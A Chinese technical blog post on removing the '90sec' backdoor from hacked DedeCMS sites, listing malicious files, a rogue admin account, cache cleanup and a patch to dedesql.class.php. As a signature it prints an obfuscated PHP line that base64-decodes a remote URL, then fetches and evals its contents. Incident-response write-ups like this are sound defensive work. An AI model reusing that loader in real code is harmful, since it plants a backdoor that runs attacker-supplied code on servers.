点击登录
  • 欢迎访问无限星辰技术博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站 QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏无限星辰吧
  • 好集导航开张了,传送门:好集导航

织梦被挂马90sec的解决方法

dedecms知识库 crx349 7368次浏览 0个评论 扫描二维码

织梦被挂马90sec,模板文件被修改,后台也增加了管理员账户。以下是解决方法的一些探索,都源自于网络,希望对大家有所帮助。
首先把模版修改回来吧。
清理方法:
1、删除增加的管理员:service
2、删除根目录的asdd.php
3、删除plus下的download.php,mytag_js.php90sec.php,service.php,vliw.php,vuew.php,digg.php,xiao.php,bakup.php等可疑文件。
4、织梦程序后台病毒扫描都会出现一个plus/90sec.php的文件,得每天删除,可是删除了,第二天就又出现了???可以能是getshell了,可以在后台->模板->自定义宏标记中删除其中的条目之后可以升级下include/dedesql.class.php文件即可.
5、chmod -R 555 xxxx.com/plus,给plus只读权限
6、删除data/cache/mytag-9013.htm 这种类型的所有htm文件,删除tplcache的缓存文件。
发现的越来越多了
7、数据库要清空dede_mytag表
最后备份数据,其实保险起见,最终的解决方法就是重装下程序吧,漏洞出来N天了,DEDE官方也没见说法,以上综合于网络。

 

补充:关闭php部分的Create_Function函数支持

木马特征码

//$_=@Create_Function(‘$X’,’@’.’E’.’v’.’a’.’l’.'(‘.’Gz’.’in’.’Fla’.’te’.'(‘.’Ba’.’se’.’64_’.’De’.’co’.’de’.'(‘.’Fi’.’le’.’_Ge’.’t_’.’Cont’.’ents’.'(‘.’Bas’.’e64′.’_De’.’co’.’de’.'($X)))));’);@$_(‘aH’.’R0′.’cDo’.’vL3d’.’3dy5h’.’cGku’.’Y29t’.’LmRlL’.’0JldC’.’9QR2F’.’tZS5n’.’aWY=’);

include/dedesql.class.php 漏洞修复

if(isset($GLOBALS['arrs1']))
{
    $v1 = $v2 = '';
    for($i=0;isset($arrs1[$i]);$i++)
    {
        $v1 .= chr($arrs1[$i]);
    }
    for($i=0;isset($arrs2[$i]);$i++)
    {
        //$v2 .= chr($arrs2[$i]);//注释这里
    }
    $GLOBALS[$v1] .= $v2;
}

无限星辰 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明织梦被挂马90sec的解决方法!
喜欢 (6)
[]
分享 (0)

您必须 登录 才能发表评论!